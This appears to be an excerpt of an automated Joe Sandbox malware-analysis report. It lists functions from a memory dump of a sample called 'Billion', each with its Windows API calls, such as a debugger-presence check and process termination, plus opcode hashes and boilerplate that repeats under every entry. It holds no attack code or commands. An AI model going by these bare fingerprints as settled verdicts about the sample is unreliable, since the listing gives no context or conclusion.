                                                                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.3324557168.0000000000131000.00000020.00000001.01000000.00000007.sdmp, Offset: 00130000, based on PE: true
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324518263.0000000000130000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324627869.00000000001CD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324627869.00000000001F3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324735392.00000000001FD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324772151.0000000000205000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_130000_Billion.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: Message$Translate$AcceleratorDispatchPeekSleep
                                                                                                                                                                                                                                                                                                          • String ID: (
                                                                                                                                                                                                                                                                                                          • API String ID: 3288985973-2181176062
                                                                                                                                                                                                                                                                                                          • Opcode ID: 4a5190036c72aa160e2f49a663964af2fe552416a0b338257c1e5e69eba0db19
                                                                                                                                                                                                                                                                                                          • Instruction ID: f89c53b1c9ac0aac35a416360feb88c8db9ff04049c82b26c4d906adeed2f0fb
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 4a5190036c72aa160e2f49a663964af2fe552416a0b338257c1e5e69eba0db19
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 65F05E30604344DBEB749BA0DC89FAA77ADAB44714F104929E219930D0DB70D5888B25
                                                                                                                                                                                                                                                                                                          Function 0015014B Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 43COMMON
                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          • __CxxThrowException@8.LIBVCRUNTIME ref: 001509D8
                                                                                                                                                                                                                                                                                                            • Part of subcall function 00153614: RaiseException.KERNEL32(?,?,?,001509FA,?,00000000,?,?,?,?,?,?,001509FA,00000000,001F9758,00000000), ref: 00153674
                                                                                                                                                                                                                                                                                                          • __CxxThrowException@8.LIBVCRUNTIME ref: 001509F5
                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.3324557168.0000000000131000.00000020.00000001.01000000.00000007.sdmp, Offset: 00130000, based on PE: true
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324518263.0000000000130000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324627869.00000000001CD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324627869.00000000001F3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324735392.00000000001FD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324772151.0000000000205000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_130000_Billion.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: Exception@8Throw$ExceptionRaise
                                                                                                                                                                                                                                                                                                          • String ID: Unknown exception
                                                                                                                                                                                                                                                                                                          • API String ID: 3476068407-410509341
                                                                                                                                                                                                                                                                                                          • Opcode ID: b1887cd42fe1a3a65668d7bbbc9a70a4af581deb63b74204dde6762683531418
                                                                                                                                                                                                                                                                                                          • Instruction ID: 5fc9e71ac74a9f06af9a0a99ac938a0f1ef50e06ccc32a9c37b986e2040a32a5
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: b1887cd42fe1a3a65668d7bbbc9a70a4af581deb63b74204dde6762683531418
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: B2F0223480060CF7CB06BAE4DC569AE776C5E28356B604125BD389F5A2FB30EA1DCAC0
                                                                                                                                                                                                                                                                                                          Function 001B89B6 Relevance: 4.9, APIs: 3, Instructions: 430COMMON
                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          • GetCurrentProcess.KERNEL32(00000000,00000067,000000FF,?,?,?), ref: 001B8D52
                                                                                                                                                                                                                                                                                                          • TerminateProcess.KERNEL32(00000000), ref: 001B8D59
                                                                                                                                                                                                                                                                                                          • FreeLibrary.KERNEL32(?,?,?,?), ref: 001B8F3A
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.3324557168.0000000000131000.00000020.00000001.01000000.00000007.sdmp, Offset: 00130000, based on PE: true
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324518263.0000000000130000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324627869.00000000001CD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324627869.00000000001F3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324735392.00000000001FD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324772151.0000000000205000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_130000_Billion.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: Process$CurrentFreeLibraryTerminate
                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                          • API String ID: 146820519-0
                                                                                                                                                                                                                                                                                                          • Opcode ID: 32a58f1c3d8a5121b46be7967d1d83ecb1e3a1a3df9cb6f7b95616cfcf040653
                                                                                                                                                                                                                                                                                                          • Instruction ID: 092d3a55c435d566fe4285de114d2539fe59dfe6e401557e95c4c00a7d2e3861
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 32a58f1c3d8a5121b46be7967d1d83ecb1e3a1a3df9cb6f7b95616cfcf040653
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 8C127C719083019FD714DF28C484BAABBE5FF98718F14895DF8898B392DB30E945CB92
                                                                                                                                                                                                                                                                                                          Function 001B9AF3 Relevance: 4.7, APIs: 3, Instructions: 233COMMON
                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.3324557168.0000000000131000.00000020.00000001.01000000.00000007.sdmp, Offset: 00130000, based on PE: true
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324518263.0000000000130000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324627869.00000000001CD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324627869.00000000001F3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324735392.00000000001FD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324772151.0000000000205000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_130000_Billion.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: _wcslen$_strcat
                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                          • API String ID: 306214811-0
                                                                                                                                                                                                                                                                                                          • Opcode ID: 92d90bcf94012c78c5fda50763fd96a826d2057750196513b7a4ea908e99ac87
                                                                                                                                                                                                                                                                                                          • Instruction ID: cf4161e5c7cb99c7e8b04ac7206a91b2c8bfd572b2881c3fcd1c91e6e1733f7a
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 92d90bcf94012c78c5fda50763fd96a826d2057750196513b7a4ea908e99ac87
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 34A17B31604605EFCB18DF58C5D19A9BBF1FF59314B2084ADE95A8F2A2DB31ED46CB80
                                                                                                                                                                                                                                                                                                          Function 0014FCAD Relevance: 4.6, APIs: 3, Instructions: 75timewindowCOMMON
                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                            • Part of subcall function 001361A9: Shell_NotifyIconW.SHELL32(00000001,?), ref: 00136299
                                                                                                                                                                                                                                                                                                          • KillTimer.USER32(?,00000001,?,?), ref: 0014FD36
                                                                                                                                                                                                                                                                                                          • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 0014FD45
                                                                                                                                                                                                                                                                                                          • Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 0018FE33
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.3324557168.0000000000131000.00000020.00000001.01000000.00000007.sdmp, Offset: 00130000, based on PE: true
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324518263.0000000000130000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324627869.00000000001CD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324627869.00000000001F3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324735392.00000000001FD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324772151.0000000000205000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_130000_Billion.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: IconNotifyShell_Timer$Kill
                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                          • API String ID: 3500052701-0
                                                                                                                                                                                                                                                                                                          • Opcode ID: 6f8b94fb9cb0d17850de30ae1abb58a6fd1b4faa91e3fa311a162e902206f979
                                                                                                                                                                                                                                                                                                          • Instruction ID: f435c6f3d949e37aa09a32c9faec83c68a46f0c2ee988154160506ade35345d6
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 6f8b94fb9cb0d17850de30ae1abb58a6fd1b4faa91e3fa311a162e902206f979
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 08319571904744AFEB32DF64D859BE7BBECAB12308F0044AEE69957242C3745A86CF51
                                                                                                                                                                                                                                                                                                          Function 00168A2E Relevance: 4.6, APIs: 3, Instructions: 61COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          • CloseHandle.KERNEL32(00000000,00000000,?,?,0016894C,?,001F9CE8,0000000C), ref: 00168A84
                                                                                                                                                                                                                                                                                                          • GetLastError.KERNEL32(?,0016894C,?,001F9CE8,0000000C), ref: 00168A8E
                                                                                                                                                                                                                                                                                                          • __dosmaperr.LIBCMT ref: 00168AB9
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.3324557168.0000000000131000.00000020.00000001.01000000.00000007.sdmp, Offset: 00130000, based on PE: true
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324518263.0000000000130000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324627869.00000000001CD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324627869.00000000001F3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324735392.00000000001FD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324772151.0000000000205000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_130000_Billion.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: CloseErrorHandleLast__dosmaperr
                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                          • API String ID: 2583163307-0
                                                                                                                                                                                                                                                                                                          • Opcode ID: 53b73adf378357322177db1bc44d870857553bda0e73c6c9a2dce47fbd308a8f
                                                                                                                                                                                                                                                                                                          • Instruction ID: 89d2f89b4b3fad25e178471cbdd105a897bbfaa07100bcab034f0c64bb11bbca
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 53b73adf378357322177db1bc44d870857553bda0e73c6c9a2dce47fbd308a8f
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 570149326066609AC72462B8BC4AB7E7B8A5B91734F29031AFD148B2D3DF30CDE14191
                                                                                                                                                                                                                                                                                                          Function 0016970B Relevance: 4.6, APIs: 3, Instructions: 50COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          • SetFilePointerEx.KERNEL32(00000000,00000000,00000002,FF8BC369,00000000,FF8BC35D,00000000,1875FF1C,1875FF1C,?,001697BA,FF8BC369,00000000,00000002,00000000), ref: 00169744
                                                                                                                                                                                                                                                                                                          • GetLastError.KERNEL32(?,001697BA,FF8BC369,00000000,00000002,00000000,?,00165ED4,00000000,00000000,00000000,00000002,00000000,FF8BC369,00000000,00156F41), ref: 0016974E
                                                                                                                                                                                                                                                                                                          • __dosmaperr.LIBCMT ref: 00169755
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.3324557168.0000000000131000.00000020.00000001.01000000.00000007.sdmp, Offset: 00130000, based on PE: true
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324518263.0000000000130000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324627869.00000000001CD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324627869.00000000001F3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324735392.00000000001FD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324772151.0000000000205000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_130000_Billion.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: ErrorFileLastPointer__dosmaperr
                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                          • API String ID: 2336955059-0
                                                                                                                                                                                                                                                                                                          • Opcode ID: fe5a18b76ccadfe396f5532247ef58365967d0ef2240153c06a21f3e5fc808df
                                                                                                                                                                                                                                                                                                          • Instruction ID: 1823da1f7d1b51622402cd835e3369e789037d68966e074891c37e43322f5b47
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: fe5a18b76ccadfe396f5532247ef58365967d0ef2240153c06a21f3e5fc808df
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 92014C32620514ABCB059F99EC06C6E7B2EEB85330B240219F8118B190EB30DD618F90
                                                                                                                                                                                                                                                                                                          Function 0013CAB0 Relevance: 4.1, APIs: 1, Strings: 1, Instructions: 587COMMON
                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          • __Init_thread_footer.LIBCMT ref: 0013CEEE
                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.3324557168.0000000000131000.00000020.00000001.01000000.00000007.sdmp, Offset: 00130000, based on PE: true
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324518263.0000000000130000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324627869.00000000001CD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324627869.00000000001F3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324735392.00000000001FD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324772151.0000000000205000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_130000_Billion.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: Init_thread_footer
                                                                                                                                                                                                                                                                                                          • String ID: `
                                                                                                                                                                                                                                                                                                          • API String ID: 1385522511-609909085
                                                                                                                                                                                                                                                                                                          • Opcode ID: 92a80f791682eeef1ef70b799242c2c778e868bc2750e32f31eebcdf315f98c7
                                                                                                                                                                                                                                                                                                          • Instruction ID: 3ea7566f9655a8c4581bdb6f313a58ba6a05089a7448f0654597dbc5d7601a0b
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 92a80f791682eeef1ef70b799242c2c778e868bc2750e32f31eebcdf315f98c7
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 1532D175A00205EFDB24DF58C884ABABBB9FF45350F158069E906AB252C774EE42CFD0
                                                                                                                                                                                                                                                                                                          Function 00142B20 Relevance: 4.0, APIs: 1, Strings: 1, Instructions: 531COMMON
                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          • __Init_thread_footer.LIBCMT ref: 00143006
                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.3324557168.0000000000131000.00000020.00000001.01000000.00000007.sdmp, Offset: 00130000, based on PE: true
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324518263.0000000000130000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324627869.00000000001CD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324627869.00000000001F3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324735392.00000000001FD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324772151.0000000000205000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_130000_Billion.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: Init_thread_footer
                                                                                                                                                                                                                                                                                                          • String ID: CALL
                                                                                                                                                                                                                                                                                                          • API String ID: 1385522511-4196123274
                                                                                                                                                                                                                                                                                                          • Opcode ID: 6a466144e238da82c8047ea24600f96503d3fd99f24de20a1f06b6caba58f549
                                                                                                                                                                                                                                                                                                          • Instruction ID: ec22eed4630e6f49e56f5ac3b5928fca8b2b45c71374caa6006e21ec9c95a923
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 6a466144e238da82c8047ea24600f96503d3fd99f24de20a1f06b6caba58f549
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 4B228A70608201DFC714DF24C884B2ABBF1BF99314F65895DF49A8B3A2D772E985CB52
                                                                                                                                                                                                                                                                                                          Function 00141990 Relevance: 3.6, APIs: 2, Instructions: 643COMMON
                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.3324557168.0000000000131000.00000020.00000001.01000000.00000007.sdmp, Offset: 00130000, based on PE: true
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324518263.0000000000130000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324627869.00000000001CD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324627869.00000000001F3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324735392.00000000001FD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324772151.0000000000205000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_130000_Billion.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                                                                          • Opcode ID: 55088c36f66ea569c236d26659ba5b0434befb0ede434114337914189745c7aa
                                                                                                                                                                                                                                                                                                          • Instruction ID: 09cff4d639b8aca9d79579d10392782dc90d145ce20e00c23a12e4c185d6da2b
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 55088c36f66ea569c236d26659ba5b0434befb0ede434114337914189745c7aa
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 1932BF70A00615EFCB24EF94C881BAEB7B5FF24314F148568F955AB2A1E731EE84CB51
                                                                                                                                                                                                                                                                                                          Function 00133A95 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 64COMMON
                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          • GetOpenFileNameW.COMDLG32(?), ref: 0017413B
                                                                                                                                                                                                                                                                                                            • Part of subcall function 00135851: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,001355D1,?,?,00174B76,?,?,00000100,00000000,00000000,CMDLINE), ref: 00135871
                                                                                                                                                                                                                                                                                                            • Part of subcall function 00133A57: GetLongPathNameW.KERNEL32(?,?,00007FFF), ref: 00133A76
                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.3324557168.0000000000131000.00000020.00000001.01000000.00000007.sdmp, Offset: 00130000, based on PE: true
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324518263.0000000000130000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324627869.00000000001CD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324627869.00000000001F3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324735392.00000000001FD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324772151.0000000000205000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_130000_Billion.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: Name$Path$FileFullLongOpen
                                                                                                                                                                                                                                                                                                          • String ID: X
                                                                                                                                                                                                                                                                                                          • API String ID: 779396738-3081909835
                                                                                                                                                                                                                                                                                                          • Opcode ID: b444658217fd28889e54a14cd42536553dfc227fb69b0031a5c9db7b51265218
                                                                                                                                                                                                                                                                                                          • Instruction ID: 43d35e6000ad52cfe4c59c144ae53d4d544c5ee38f9ac7128c93896e73ec5a4e
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: b444658217fd28889e54a14cd42536553dfc227fb69b0031a5c9db7b51265218
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 57219071A002589BDB05DF98D809BEE7BF8AF59304F008059E559B7281DBB49A8D8FA1
                                                                                                                                                                                                                                                                                                          Function 0013396B Relevance: 3.1, APIs: 2, Instructions: 77windowCOMMON
                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          • Shell_NotifyIconW.SHELL32(00000000,?), ref: 00133A3C
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.3324557168.0000000000131000.00000020.00000001.01000000.00000007.sdmp, Offset: 00130000, based on PE: true
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324518263.0000000000130000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324627869.00000000001CD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324627869.00000000001F3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324735392.00000000001FD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324772151.0000000000205000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_130000_Billion.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: IconNotifyShell_
                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                          • API String ID: 1144537725-0
                                                                                                                                                                                                                                                                                                          • Opcode ID: 6b9403b7c466453ec04b3172c7829707b7d22c9f704df65a45e4059c74eec90c
                                                                                                                                                                                                                                                                                                          • Instruction ID: ed34fdc3a738719dc08f95f7ef7bbf357dbc7cb1c98e2e784190889b43e040e6
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 6b9403b7c466453ec04b3172c7829707b7d22c9f704df65a45e4059c74eec90c
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: DD316171604701DFD720DF24E889797BBE8FB49709F00092EE6D987241E775A948CB56
                                                                                                                                                                                                                                                                                                          Function 0013331B Relevance: 3.0, APIs: 2, Instructions: 30COMMON
                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          • IsThemeActive.UXTHEME ref: 0013333D
                                                                                                                                                                                                                                                                                                            • Part of subcall function 001332E6: SystemParametersInfoW.USER32(00002000,00000000,?,00000000), ref: 001332FB
                                                                                                                                                                                                                                                                                                            • Part of subcall function 001332E6: SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 00133312
                                                                                                                                                                                                                                                                                                            • Part of subcall function 0013338B: GetCurrentDirectoryW.KERNEL32(00007FFF,?,?,?,?,?,00133368,?), ref: 001333BB
                                                                                                                                                                                                                                                                                                            • Part of subcall function 0013338B: IsDebuggerPresent.KERNEL32(?,?,?,?,?,?,00133368,?), ref: 001333CE
                                                                                                                                                                                                                                                                                                            • Part of subcall function 0013338B: GetFullPathNameW.KERNEL32(00007FFF,?,?,00202418,00202400,?,?,?,?,?,?,00133368,?), ref: 0013343A
